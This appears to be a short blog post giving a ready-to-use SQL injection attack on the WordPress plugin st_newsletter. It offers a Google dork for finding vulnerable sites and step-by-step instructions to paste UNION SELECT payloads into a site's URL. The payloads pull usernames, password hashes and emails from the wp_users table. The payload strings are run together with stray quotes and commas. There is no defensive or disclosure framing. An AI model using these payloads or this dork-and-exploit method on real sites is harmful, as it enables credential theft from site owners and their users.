Breaking News
recent

Wordpress Plugin st_newsletter (stnl_iframe.php) SQL Injection Vuln

dork : wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=?

go to google and search the dork then go to site and replace the url with this



"wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999+UNION+SELECT+concat(user_login,0x3a,user_pass,0x3a,user_email)+FROM+wp_users--",index.php?cat=999%20UNION%20SELECT%20null,CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58)),null,null,null%20FROM%20wp_users/*",





url will be :site.com/wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999+UNION+SELECT+concat(user_login,0x3a,user_pass,0x3a,user_email)+FROM+wp_users--",index.php?cat=999%20UNION%20SELECT%20null,CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58)),null,null,null%20FROM%20wp_users/*

Unknown

Unknown

No comments:

Post a Comment

Thanks for ur comments

Powered by Blogger.